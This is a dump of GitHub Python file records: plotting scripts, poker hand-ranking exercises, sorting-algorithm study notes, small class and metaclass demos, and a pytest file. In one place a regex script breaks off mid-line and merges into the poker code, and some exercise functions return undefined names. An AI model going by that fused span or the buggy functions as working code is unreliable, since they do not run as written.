operators\"):\n\t\tcheck_syntax(condition)\n\n\n@pytest.mark.parametrize(\n\t\"condition\",\n\t[\n\t\t\"SomeCommand1 OR NOT SomeCommand2\",\n\t\t\"SomeCommand1 NOT NOT SomeCommand2\",\n\t\t\"SomeCommand1 NOT SomeCommand2\",\n\t]\n)\ndef test_check_staples_errors(condition):\n\twith pytest.raises(ForsetiSyntaxError, match=\"Operator 'NOT' cannot be used without operator 'AND'\"):\n\t\tcheck_syntax(condition)\n","repo_name":"Kirill-Lekhov/forseti_lang","sub_path":"forseti_lang/checkers/syntax_test.py","file_name":"syntax_test.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"15075404095","text":"# Imports\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef plotGraphs():\n\n # Set Number of Samples\n totSamples = 20000\n levels = np.array([0.0,0.01,0.2,0.4,0.6])\n\n # Read MCMC Sample Data\n data1 = np.loadtxt('paramTraces_10.txt',skiprows=1)\n data1 = data1[:totSamples,2:]\n data2 = np.loadtxt('paramTraces_11.txt',skiprows=1)\n data2 = data2[:totSamples,2:]\n data3 = np.loadtxt('paramTraces_12.txt',skiprows=1)\n data3 = data3[:totSamples,2:]\n\n # Read Optimal Points\n opt1 = np.loadtxt('OptimalPoints_10.txt')\n opt2 = np.loadtxt('OptimalPoints_11.txt')\n opt3 = np.loadtxt('OptimalPoints_12.txt')\n\n # Create Exact Surfaces\n delta = 0.025\n x = np.arange(-3.0, 3.0, delta)\n y = np.arange(-3.0, 3.0, delta)\n X, Y = np.meshgrid(x, y)\n Z1 = Y**2 + X**2*(X-1.0)*(X-2.0)\n Z2 = Y**2 - X**2*(X+1.0)\n t1 = np.arange(0.0, 2.0*np.pi, delta)\n t2 = np.arange(0.0, 2.0*np.pi, delta)\n T1, T2 = np.meshgrid(t1, t2)\n Z3 = np.abs(1.0/12.0 - 1.0/3.0*(np.sin(T1-T2)+np.sin(T1-0))) + np.abs(-1.0/12.0-1.0/3.0*(np.sin(T2-T1)+np.sin(T2-0.0)))\n\n plt.figure(figsize=(8,6))\n ax = plt.subplot(2,3,1)\n ax.plot(data1[:,0],data1[:,1],'bo',markersize=1,alpha=0.5)\n ax.contour(X, Y, Z1, levels)\n ax.set_title('First Curve')\n ax.set_xlim([-3.0,3.0])\n ax.set_ylim([-3.0,3.0])\n\n ax = plt.subplot(2,3,2)\n ax.plot(data2[:,0],data2[:,1],'bo',markersize=1,alpha=0.5)\n ax.contour(X, Y, Z2, levels)\n ax.set_title('Alpha Curve')\n ax.set_xlim([-3.0,3.0])\n ax.set_ylim([-3.0,3.0])\n\n ax = plt.subplot(2,3,3)\n ax.plot(data3[:,0],data3[:,1],'bo',markersize=1,alpha=0.5)\n ax.contour(t1, t2, Z3, levels)\n ax.set_title('Kuramoto')\n ax.set_xlim([0,2*np.pi])\n ax.set_ylim([0,2*np.pi])\n\n ax = plt.subplot(2,3,4)\n ax.plot(opt1[:,0],opt1[:,1],'ro',markersize=4,alpha=0.6)\n ax.contour(X, Y, Z1, levels)\n ax.set_xlim([-3.0,3.0])\n ax.set_ylim([-3.0,3.0])\n\n ax = plt.subplot(2,3,5)\n ax.plot(opt2[:,0],opt2[:,1],'ro',markersize=4,alpha=0.6)\n ax.contour(X, Y, Z2, levels)\n ax.set_xlim([-3.0,3.0])\n ax.set_ylim([-3.0,3.0])\n\n ax = plt.subplot(2,3,6)\n ax.plot(opt3[:,0],opt3[:,1],'ro',markersize=4,alpha=0.6)\n ax.contour(t1, t2, Z3, levels)\n ax.set_xlim([0,2*np.pi])\n ax.set_ylim([0,2*np.pi])\n\n plt.tight_layout()\n plt.savefig('sample_Distribution.pdf')\n # plt.show()\n\n# =============\n# MAIN FUNCTION\n# =============\nif __name__ == \"__main__\":\n plotGraphs()","repo_name":"desResLab/tulip","sub_path":"test/pyTests/02_MCMC/showPoints2D.py","file_name":"showPoints2D.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"41782829684","text":"import regex as re\nimport sys\nimport os\nimport getopt\n\nfile = open(sys.argv[1])\nficheiro_atual = open(\"tagged/tagged.tagged\",'w')\nfrase_atual = []\nfrase = False\n\nfor line in file.readlines():\n match = re.match(r'$',line)\n # if match:\n # file_name = match[1]+ '-' + match[2]+ '-'+match[3]+'.tagged'\n # ficheiro_atual = open('tagged/'+file_name,'w')\n # ficheiro_atual.write('\\n')\n # continue\n\n if re.match(r'',line):\n frase_atual = []\n frase = True\n continue\n\n if re.match(r'',line):\n frase = False\n ficheiro_atual.write(' '.join(frase_atual) + '\\n')\n continue\n\n # if re.match(r'',line):\n # ficheiro_atual.close()\n # continue\n\n if re.match(r' SF_rank: # Look if the actual card is greater than the previous\n SF_rank = max(rank, SF_rank) # If it is, make it the highest rank up to now\n SF_hand = this_hand # Assign it's card to the straight flush hand\n \n elif kind(4,rank): \n \"Then check for Four of a Kind\"\n if rank > best_4_rank:\n k4_hand = [card for card in this_hand if '--23456789TJQKA'[kind(4,rank)] in card]\n k4_hand = k4_hand + [card for card in this_hand if '--23456789TJQKA'[kind(4,rank)] not in card]\n best_4_rank = max(best_4_rank, rank)\n FK_hand = list(k4_hand)\n \n elif kind(3, rank) and kind(2, rank):\n if rank > FH_ranks:\n FH_ranks = max(rank, FH_ranks)\n k2_cards = [card for card in this_hand if '--23456789TJQKA'[kind(2,rank)] in card]\n k3_cards = [card for card in this_hand if '--23456789TJQKA'[kind(3,rank)] in card]\n FH_hand = k2_cards + k3_cards\n \n elif flush(this_hand):\n \"Check for the flushs in the cards\"\n if flush(this_hand):\n if rank > FL_rank:\n FL_rank = max(rank, FL_rank)\n FL_hand = list(this_hand)\n \n elif straight(rank):\n if rank > ST_rank:\n ST_rank = max(rank, FL_rank)\n ST_hand = list(this_hand)\n \n elif kind(3, rank):\n if rank > K3_rank:\n K3_rank = max(rank, K3_rank)\n K3_hand = list(this_hand)\n \n elif two_pair(rank):\n if rank > TP_rank:\n TP_rank = max(rank, TP_rank)\n TP_hand = [card for card in this_hand if '--23456789TJQKA'[two_pair(rank)[0]] in card]\n TP_hand = TP_hand + [card for card in this_hand if '--23456789TJQKA'[two_pair(rank)[1]] in card]\n TP_hand = TP_hand + [card for card in this_hand if '--23456789TJQKA'[two_pair(rank)[0]] not in card and '--23456789TJQKA'[two_pair(rank)[1]] not in card]\n \n elif kind(2, rank):\n if rank > pair_rank:\n pair_rank = max(rank, pair_rank)\n pair_hand = [card for card in this_hand if '--23456789TJQKA'[kind(2,rank)] in card]\n pair_hand = pair_hand + [card for card in this_hand if '--23456789TJQKA'[kind(2,rank)] not in card]\n else:\n if rank > HC_rank:\n HC_rank = max(rank, pair_rank)\n HC_card_hand = list(this_hand)\n \n \"Return values in order of importance if they are assigned\"\n if SF_hand:\n return SF_hand\n elif FK_hand:\n return FK_hand\n elif FH_hand:\n return FH_hand\n elif FL_hand:\n return FL_hand\n elif ST_hand:\n return ST_hand\n elif K3_hand:\n return K3_hand\n elif TP_hand:\n return TP_hand\n elif pair_card:\n return pair_card\n else:\n return HC_hand\n \n \n# ------------------\n# Provided Functions\n# \n# You may want to use some of the functions which\n# you have already defined in the unit to write \n# your best_hand function.\n\n\n# In[4]:\n\n\ndef best_hand(hand):\n \"From a 7-card hand, return the best 5 card hand.\"\n return max(itertools.combinations(hand, 5), key=hand_rank)\n\n\n# In[5]:\n\n\nprint(test_best_hand())\n\n\n# ## With Jokers\n\n# The card '?B' is the black joker and can only be replaced with a black card\n# The card '?R' is the red joker and can only be replaced with a red card\n\n# In[8]:\n\n\ndef best_wild_hand(hand):\n \"Try all values for jokers in all 5-card selections.\"\n \n hand = [card if card != '?R' else r+s for r in '23456789TJQKA' for s in 'HD' for card in hand ]\n hand = [card if card != '?B' else r+s for r in '23456789TJQKA' for s in 'SC' for card in hand ]\n def chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n hands = [hand for hand in chunks(hand, 7)]\n all_max = []\n for hand in hands:\n all_max.append(max(itertools.combinations(hand, 5), key=hand_rank))\n\n return max(all_max, key=hand_rank)\n\n\ndef test_best_wild_hand():\n assert (sorted(best_wild_hand(\"6C 7C 8C 9C TC 5C ?B\".split()))\n == ['7C', '8C', '9C', 'JC', 'TC'])\n assert (sorted(best_wild_hand(\"TD TC 5H 5C 7C ?R ?B\".split()))\n == ['7C', 'TC', 'TD', 'TH', 'TS'])\n assert (sorted(best_wild_hand(\"JD TC TH 7C 7D 7S 7H\".split()))\n == ['7C', '7D', '7H', '7S', 'JD'])\n return 'test_best_wild_hand passes'\n\n# ------------------\n# Provided Functions\n# \n# You may want to use some of the functions which\n# you have already defined in the unit to write \n# your best_hand function.\n\ndef hand_rank(hand):\n \"Return a value indicating the ranking of a hand.\"\n ranks = card_ranks(hand) \n if straight(ranks) and flush(hand):\n return (8, max(ranks))\n elif kind(4, ranks):\n return (7, kind(4, ranks), kind(1, ranks))\n elif kind(3, ranks) and kind(2, ranks):\n return (6, kind(3, ranks), kind(2, ranks))\n elif flush(hand):\n return (5, ranks)\n elif straight(ranks):\n return (4, max(ranks))\n elif kind(3, ranks):\n return (3, kind(3, ranks), ranks)\n elif two_pair(ranks):\n return (2, two_pair(ranks), ranks)\n elif kind(2, ranks):\n return (1, kind(2, ranks), ranks)\n else:\n return (0, ranks)\n \ndef card_ranks(hand):\n \"Return a list of the ranks, sorted with higher first.\"\n ranks = ['--23456789TJQKA'.index(r) for r, s in hand]\n ranks.sort(reverse = True)\n return [5, 4, 3, 2, 1] if (ranks == [14, 5, 4, 3, 2]) else ranks\n\ndef flush(hand):\n \"Return True if all the cards have the same suit.\"\n suits = [s for r,s in hand]\n return len(set(suits)) == 1\n\ndef straight(ranks):\n \"\"\"Return True if the ordered \n ranks form a 5-card straight.\"\"\"\n return (max(ranks)-min(ranks) == 4) and len(set(ranks)) == 5\n\ndef kind(n, ranks):\n \"\"\"Return the first rank that this hand has \n exactly n-of-a-kind of. Return None if there \n is no n-of-a-kind in the hand.\"\"\"\n for r in ranks:\n if ranks.count(r) == n: return r\n return None\n\ndef two_pair(ranks):\n \"\"\"If there are two pair here, return the two \n ranks of the two pairs, else None.\"\"\"\n pair = kind(2, ranks)\n lowpair = kind(2, list(reversed(ranks)))\n if pair and lowpair != pair:\n return (pair, lowpair)\n else:\n return None \n\n\n# In[48]:\n\n\ntest_best_wild_hand()\n\n\n# In[103]:\n\n\nbest_wild_hand(\"6C 7C 8C 9C TC 5C ?B\".split())\n\n\n# In[102]:\n\n\nbest_wild_hand(\"6C 7C 8C 9C TC 5C ?B\".split())\n\n","repo_name":"SakaRicky/Design_of_computer_programs","sub_path":"PS1 .py","file_name":"PS1 .py","file_ext":"py","file_size_in_byte":10769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"44504087594","text":"import numpy as np\nimport pandas as pd\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mt\nimport sys\n# Screentime data from .csv\n\ndef load_screen(filename='~/Desktop/Comics/codes/cap.csv'):\n\t'''Load .csv of screentimes to pandas dataframe'''\n\tdf=pd.read_csv(filename,index_col=0)\n\treturn df\n\ndef to_times(df,skipcol=0,skiprow=0):\n\t'''Converts df values to timedelta objects'''\n\treturn df.iloc[skiprow:,skipcol:].apply(pd.to_timedelta)\n\ndef load_csv(filename='~/Desktop/Comics/codes/cap.csv'):\n\tdf1=load_screen()\n\tdf=to_times(df1,skipcol=3,skiprow=2)\n\treturn df1, df\n\ndef series(df1, subset=None, level=0):\n\tdf2=df1.drop('Runtime')\n\n\tif subset==None: # this is for the whole MCU\n\t\tdf=to_times(df2,skipcol=3,skiprow=2)\n\t\tc_run=df.sum(axis=1)\n\t\tc_series=c_run.sort_values(ascending=False)\n\t\tfilm_num=1\n\t\tmax_time=None\n\t\n\telse: #select subset group\t\n\t\tdf2=df2.T.set_index('Group',append=True).T # sets Group row as an index\n\t\tp=df2.xs(subset,axis=1,level=1)\n\t\tfilm_num=len(p.columns)\n\t\tp=to_times(p,skiprow=1)\n\t\tmax_time=pd.to_numeric(p.max())\n\t\tc_series=p[p.columns[level]].sort_values(ascending=False)\n\treturn c_series, (film_num,max_time)\n\ndef series_all(df1, subset='Thor'):\n\tdf2=df1.drop('Runtime')\n\tdf2=df2.T.set_index('Group',append=True).T # sets Group row as an index\n\tp=df2.xs(subset,axis=1,level=1)\n\tfilm_num=len(p.columns)\n\tp=to_times(p,skiprow=1)\n\tmax_time=pd.to_numeric(p.max())\n\tr=p.sum(axis=1)\n\tc_series=r.sort_values(ascending=False)\n\n\treturn c_series\n\ndef trip_plot(df1, subset='Thor',num_chars=6,units='min',colors=None, fig_num=1):\n\tc_series,(film_num,max_time)=series(df1,subset=subset,level=0)\n\t\n\truns=[]\n\tfor a in range(0,film_num):\n\t\tb,c=series(df1,subset=subset,level=a)\n\t\truns.append(b)\n\t\n\truns=runs[::-1] # so chronologically\n\n\tif units=='hrs':\n\t\tun=3600.*1E9\n\telse:\n\t\tun=60.*1E9\n\n\t# Need this to determine consistent y-scale across plots\n\tmax_time=max_time.max()/un\n\tmax_time=(np.floor(max_time/10)+1)*10\n\n\t# plots\n\tfig=plt.figure(fig_num,figsize=(9,4))\n\tfor a in range(0,film_num):\n\t\ts=plt.subplot(1,film_num,a+1)\n\t\t\t\t\n\t\tbars=runs[a].index[:num_chars]\n\t\theights=pd.to_numeric(runs[a].values[:num_chars])/un #timedelta to minutes\n\t\typos=np.arange(len(bars))\n\t\t\n\t\t# get colors\n\t\tvill=df1['Colors'].to_dict()\n\t\tvills=[vill[x] for x in bars]\t\t\n\n\t\tplt.title(runs[a].name)\t\n\t\tplt.bar(ypos, heights,color=vills)\n\t\tplt.xticks(ypos, bars, rotation=45)\n\t\t#plt.ylim(ymax=max_time)\n\t\tplt.ylim(ymax=80) # same scale for everyone\n\t\tplt.ylabel('Screentime ('+units+')')\n\t\t\n\t\ts.spines['right'].set_visible(False)\n\t\ts.spines['top'].set_visible(False)\n\t\t# make axes invisible\n\t\tif a>0:\n\t\t\ts.yaxis.set_visible(False)\n\t\t\ts.spines['left'].set_visible(False)\n\tplt.subplots_adjust(bottom=0.2,wspace=0.1)\n\t#plt.show()\n\n\treturn runs\n\ndef plot_screentimes(c_series,subset=None, movie=None, num_chars=6,colors=None, units='min'):\n\t'''Bar plot of Screentimes for characters.'''\n\tif units=='hrs':\n\t\tun=3600.*1E9\n\telse:\n\t\tun=60.*1E9\n\tplt.figure(figsize=(9,4))\n\tc=plt.subplot(1,1,1)\n\tbars=c_series.index[:num_chars]\n\theights=pd.to_numeric(c_series.values[:num_chars])/un #timedelta to minutes\n\typos=np.arange(len(bars))\n\n\t\t\n\tvill=df1['Colors'].to_dict()\n\tvills=[vill[x] for x in bars]\t\t\n\tplt.bar(ypos, heights,color=vills)\n\tplt.xticks(ypos, bars, rotation=45)\n\tplt.ylabel('Screentime ('+units+')')\n\tplt.subplots_adjust(bottom=0.3)\n\tc.spines['right'].set_visible(False)\n\tc.spines['top'].set_visible(False)\t\n\t#plt.show()\n\treturn None\n\ndef plot_percents(c_series,subset=None, movie=None, num_chars=6,colors=None, units='min'):\n\t'''Bar plot of Screentimes for characters in percentage of total screentime.'''\n\tplt.figure(figsize=(9,4))\n\tc=plt.subplot(1,1,1)\n\tc_series=c_series.sort_values(ascending=False)\n\tbars=c_series.index[:num_chars]\n\theights=pd.to_numeric(c_series.values[:num_chars]) #timedelta to minutes\n\typos=np.arange(len(bars))\n\tvill=df1['Colors'].to_dict()\n\tvills=[vill[x] for x in bars]\t\t\n\tplt.bar(ypos, heights,color=vills)\n\tplt.xticks(ypos, bars, rotation=45)\n\tplt.ylabel('Screentime Percentage (%)')\n\t#plt.ylim(ymax=60)\n\tplt.subplots_adjust(bottom=0.3)\n\tc.spines['right'].set_visible(False)\n\tc.spines['top'].set_visible(False)\t\n\t#plt.show()\n\treturn None\n#--------------------\n# Main Stuff\n#------------------\n\ndf1, df=load_csv()\n\n# Add colour column\ncolor_dict={'V':'k','G':'0.5','Stark':'#b60000', 'Cap':'#002ea5', 'Avengers':'#3f829d', 'IM':'#b60000', 'CA':'#002ea5','Thor':'#0691f3', 'GotG':'#307b1c', 'Team':'b','AM':'cyan','Hulk':'g','Next':'magenta','Strange':'gold','Parker':'#980002','BP':'#380282','Marvel':'darkgreen','Ant':'cyan'}\n\nd=df1[['Affiliation','Alignment']]\nd=d[3:]\ncs=[]\nfor a in d.values:\n\tif a[1]=='V':\n\t\tcs.append('k')\n\telif a[1]=='G':\n\t\tcs.append('0.75')\n\telse:\n\t\tcs.append(color_dict[a[0]])\n\n# Make a colour column\ndf1['Colors']=[None]*3+cs\ncols=df1.columns.tolist()\ncols=cols[:2]+[cols[-1]]+cols[2:-1]\ndf1=df1[cols]\n\n# Total runtimes by group\nruns=df1.loc[['Group','Runtime']].T\nruns['Runtime']=runs['Runtime'].apply(pd.to_timedelta)\nruns_tot=runs.groupby('Group').sum()\ntots=runs_tot.to_dict()['Runtime']\n#-------------\n# Plots\n#-------------\n\n# by group\nun_groups=df1.loc['Group'].unique()[2:]\n\nfor num, group in enumerate(un_groups):\n\t# lets make these percentages\n\ttot=tots[group]\n\tj=trip_plot(df1,subset=group,fig_num=num)\n\t#p=series_all(df1,subset=group)/tot*100\n\t#r=plot_percents(p)\n\n# in total\nc_series,x=series(df1)\nc=plot_screentimes(c_series,num_chars=10,colors='k',units='hrs')\n\nplt.show()\n","repo_name":"kimikovader/comic_db","sub_path":"screentime.py","file_name":"screentime.py","file_ext":"py","file_size_in_byte":5469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"14964118792","text":"fact = lambda num: 1 if num == 0 else num * fact(num - 1)\n\nseries = lambda n, x: sum([(n ** i) / fact(i) for i in range(x + 1)])\n\nn = float(input(\"Enter the value of n: \"))\nx = int(input(\"Enter the value of x: \"))\n\nresult = series(n, x)\n\nprint(\"Result:\", result)\n\nresult = 0\n\n\ndef calculate_sum(n):\n\n global result\n if n == 0:\n return\n\n calculate_sum(n - 1)\n result += ((-1) ** (n + 1)) / n\n\n\n\ncalculate_sum(n)\n\n\nprint(\"Result:\", result)","repo_name":"abdullahc12/Lab6ph","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18135225373","text":"class Cat:\n def __init__(self, input_name, input_breed, input_is_cuddly, input_age=0):\n self.name = input_name\n self.breed = input_breed\n self.age = input_age\n self.is_cuddly = input_is_cuddly\n self.friends = []\n \n def cuddly_cats(self, other_cat):\n if (other_cat.is_cuddly):\n self.friends.append(other_cat)\n print(f\"{other_cat.name} is {self.name}'s friend and it loves cuddlying.\")\n else:\n print(f\"{other_cat.name} doesn't like too much cuddlying.\")\n\n def __repr__(self):\n if len(self.friends) != 1:\n return f\"{self.name} is a {self.breed} and it's {self.age} years old. It has {len(self.friends)} friends.\"\n else:\n return f\"{self.name} is a {self.breed} and it's {self.age} years old. It has {len(self.friends)} friend.\"\n\ncat_zero = Cat(\"Kitty\", \"Persian\", True, 16)\ncat_one = Cat(\"Kito\", \"Tabby\", False, 2)\ncat_two = Cat(\"Tiko\", \"Ginger domestic cat\", True, 0)\n\ncat_zero.cuddly_cats(cat_one)\ncat_one.cuddly_cats(cat_zero)\ncat_zero.cuddly_cats(cat_two)\nprint(\"....................\")\nprint(cat_zero)\nprint(cat_one)\nprint(cat_two)\n\n\n","repo_name":"prisalcalde/Python-exercises","sub_path":"Cats.py","file_name":"Cats.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"39333348076","text":"class Hashable(type):\n def __new__(cls,name,base,dct):\n if \"__hash__\" not in dct:\n dct[\"__hash__\"] = lambda x: hash(id(x))\n new_class = super().__new__(cls,name,base,dct) \n return new_class\n\nclass hashable_list(list,metaclass = Hashable):\n def __init__(self,*args,**kwargs):\n super().__init__(*args,**kwargs)\n\ntest = hashable_list([1,2,3,4,5])\nprint(test)\nprint(test.__hash__)\nprint(hash(test))\n","repo_name":"imgomez0127/daily-programming","sub_path":"randomCode/hashable.py","file_name":"hashable.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"3834015259","text":"#بسم اللّه و الصلاة و السلام على جميع الأنبياء و المرسلين و آل بيوتهم الطاهرين المقربين و على من تبعهم بإحسانٍ إلى يوم الدين\r\n# ◙◙ (α) Merge Sort Algorithm\r\ncount = 0\r\n\r\nlst = [4,6,8,1,3,2,5,7]\r\nsectorA = lst[0:4]\r\nsectorB = lst[4:8]\r\n\r\n# ◘◘@Note: to allocate the size of the array before initialisation.\r\n#sortedArray = [][:5]\r\nsortedArray = []\r\ncount = 0\r\n\r\n\r\n# ◘◘@Note: to print the entire array elements without for loop.\r\n'''print(*sectorA,sep =\"\\n\")\r\nprint('\\n'.join(map(str, sectorA)))'''\r\n\r\n\r\n\r\n'''for i in range(1):\r\n if (sectorA[-1] < sectorA[0] and sectorA[-1] < sectorA[1] and sectorA[-1] < sectorA[2]):\r\n sortedArray.append(sectorA[-1])\r\n if(sectorA[0] < sectorA[1] and sectorA[0] < sectorA[2] ):\r\n sortedArray.append(sectorA[0])\r\n if(sectorA[1] < sectorA[2]):\r\n sortedArray.append(sectorA[1])\r\n sortedArray.append(sectorA[2])\r\n'''\r\n\r\n'''for i in sectorA:\r\n if(sectorA[-1] < i):\r\n sortedArray.append(sectorA[-1])\r\n if(sectorA[0] < i):\r\n sortedArray.append(sectorA[0])\r\n if (sectorA[1] < i):\r\n sortedArray.append(sectorA[1])\r\n sortedArray.append(sectorA[2])\r\n'''\r\n\r\n\r\n# ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬\r\n\r\n# ◙◙ {Select Sorting Algorithms}\r\n#───────────────────────────────────────────────────────────────────────────────────\r\n#◘◘@Note: to sort a list we need firstly to set the minimum number {declare a new variable} as the first index on the list; either it is the minimum or not, \r\n# then compare that number with the rest numbers on the list, after getting the {real minimum number}, set it to be the first index on the list.\r\n\r\nunsortedLst = [7,11,8,1,4,2,3,9,12,10]\r\nfor i in range(len(unsortedLst)):\r\n \r\n # Find the minimum element in remaining \r\n # unsorted array\r\n\r\n min_number = i\r\n\r\n for j in range(i+1, len(unsortedLst)):\r\n\r\n\r\n if unsortedLst[min_number] > unsortedLst[j]:\r\n\r\n\r\n min_number = j\r\n\r\n\r\n # Swap the found minimum element with \r\n # the first element \r\n \r\n unsortedLst[i], unsortedLst[min_number] = unsortedLst[min_number], unsortedLst[i]\r\n\r\n'''print(unsortedLst)'''\r\n\t\r\n# ◘◘Select Sorting Algorithm illustration;\r\n'''\r\n ◘ for i in range (11):\r\n min_number = 0\r\n \r\n for j in range(1,11):\r\n if (unsortedLst[0] > unsortedLst[1]):\r\n min_number = 1\r\n \r\n ▬# Then Swapping indices, The min_number will get in-place\r\n of the higher_number; That process will continuosly occured till\r\n the array got arranged.\r\n'''\r\n\r\n# ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬\r\n\r\n# ◙◙ {Bubble Sorting Algorithms}\r\n#───────────────────���───────────────────────────────────────────────────────────────\r\ndef bubbleSort(array):\r\n n = len(array)\r\n\r\n for i in range(n-1): # ◘◘ {n-1} because the last element has the index No. [(len(array)-1)]. \r\n for j in range(0,n-i-1):\r\n if (array[j] > array[j+1]):\r\n array[j], array[j+1] = array[j+1], array[j]\r\n return array\r\n '''\r\n # ◘◘Illustration: ▬ On first iteration\r\n for i in range(7):\r\n for j in range(0,6): # On first iteration i = 0\r\n if (array[1] > array[2]): # ▬ if True > then swap the indices values.\r\n array[1], array[2] = array[2],array[1]\r\n '''\r\n'''print(bubbleSort([1,3,4,5,8,6,7,2]))'''\r\n\r\n# ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬\r\n\r\n\r\n# ◙◙ {Insertion Sorting Algorithms}\r\n#───────────────────────────────────────────────────────────────────────────────────\r\n\r\nL = [4,5,8,9,2,1,3,7,6]\r\nfor i in range(1,len(L)):\r\n k = L[i]\r\n j = i - 1\r\n while (j >= 0 and L[j] > k):\r\n L[j+1] = L[j]\r\n j = j - 1\r\n L[j+1] = k\r\n\r\n'''Algorithm Analysis'''\r\n'''k = L[0]\r\nj = 0'''\r\n# if {Ture} then looping \r\n'''while (1 >= 0 and 4 > 5):\r\n L[2] = L[1]\r\n j = 0 '''\r\n# if False then keep it in its index.\r\n'''L[j+1] = k ◘◘ As {j+1 = 1}\r\n'''\r\n\r\n# ◘ get the integer value of division. » use (//) ▬ for example: {//2}. \r\n'''print(len(L) //2)'''\r\n\r\n\r\n# ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬\r\n\r\n\r\n# ◙◙ {Merge Sort Algorithm}\r\n#───────────────────────────────────────────────────────────────────────────────────\r\n# ◘ To define this Algorithm we need to pass through some steps:\r\n# ○ α) Divide the main array by its length for sub-arrays.\r\n# ○ ß) Sorting elements.\r\n# ○ Γ) Merging elements in sub-arrays; finally merge sub-arrays to the final form of array. \r\ndef mergeSort(array):\r\n if (len(array) > 1):\r\n mid_length = len(array) //2 # ◘ Get the integer number of the length.\r\n \r\n # ◙ Dividing the main array to (2) sectors {Right -- Left}..\r\n L = array[:mid_length]\r\n\r\n R = array[mid_length:]\r\n\r\n # Then Sorting The Right and Left sector Separately.\r\n\r\n # ◘◘ The Passed array will be divided till reaching out one element of each array to be compared with.\r\n mergeSort(L)\r\n\r\n mergeSort(R)\r\n\r\n i = j = k = 0\r\n \r\n\r\n # ◘ Loop till the reaching the length of both arrays and copying the main array elements\r\n # on both sub-arrays.\r\n\r\n # »» On this step: Dividing the main array to {2 arrays}; while one of these arrays\r\n # will contain the smaller valued elements and the other will contain the higher valued elements.\r\n \r\n while i < len(L) and j < len(R):\r\n # ○ Comparing with first elements in both arrays.\r\n\r\n # » If the left side element is smaller than the right side element.\r\n if (L[i] < R[j]):\r\n\r\n # ◘ Replacing the first element in the main arrays with the smaller number.\r\n array[k] = L[i]\r\n i += 1\r\n \r\n # » If the Right side element is smaller than the left side element.\r\n else:\r\n array[k] = R[j]\r\n j += 1\r\n k += 1\r\n \r\n while i < len(L):\r\n array[k] = L[i]\r\n i += 1\r\n k += 1\r\n\r\n while j < len(R):\r\n array[k] = R[j]\r\n j += 1\r\n k += 1\r\n return array\r\n\r\n\r\n'''print(mergeSort([5,6,1,3,2,7,9,8,4]))'''\r\n\r\n\r\n\r\n\r\n\r\n\r\n#────────────────────────────────────important──────────────────────────────────────\r\n# α)\r\n# ▬▬ Check if a String contains an integer number:\r\n'''x = \"asdfas5654asd\"\r\n\r\nfor i in range(len(x)):\r\n try:\r\n if (isinstance(int(x[i]), int)):\r\n print(\"Integer\")\r\n except ValueError:\r\n print(\"Not Integer\")\r\n'''\r\n\r\n\r\n# ß)\r\n# ▬▬ Inverting string value.\r\n# ◘ Method_1\r\n'''print(string[::-1])'''\r\n\r\n# ◘ Method_2\r\n'''x = \"\"\r\ncount = len(string) -1\r\nfor i in string:\r\n x += string[count]\r\n count -= 1'''\r\n\r\n\r\n\r\n# Γ)\r\n# ▬▬ getting the absolute number from float value.\r\n'''if int(n) < n:\r\n print(int(n) + 1)\r\nelse:\r\n print(n)'''\r\n\r\n\r\n\r\n# Σ)\r\n# ▬▬ using enumerate function; Note that {enumerate} will print a type (list) in a form of dictionary {key and values}.\r\n'''lst = [\"GTX 1650\",\"GTX 980\",\"GTX 970\",\"RTX 2070\"]\r\nfor i,j in enumerate(lst):\r\n print(i,j)\r\n'''\r\n\r\n\r\n''' \r\n0 GTX 1650\r\n1 GTX 980\r\n2 GTX 970\r\n3 RTX 2070\r\n'''\r\n\r\n\r\n\r\n# σ)\r\n# ▬▬ using {.round()} function that is mainly used to get the nearest decimals according to the past argument.\r\n''' ◘ Note: that while the the parameter passed to this argument is <-number> » That will return the nearest 100 number.\r\n# ╚ For example: x = 5555.456156187 └ print(round(x,-2)) ▬ returns 5600'''\r\n\r\nx = -10\r\ny = 5\r\n#print(min(abs(y),abs(x)))\r\n\r\n\r\n\r\n# µ)\r\n# ▬▬ remove an item from a list and add it to an appended new list.\r\n'''\r\ndef remove_item(x):\r\n if x == 30:\r\n 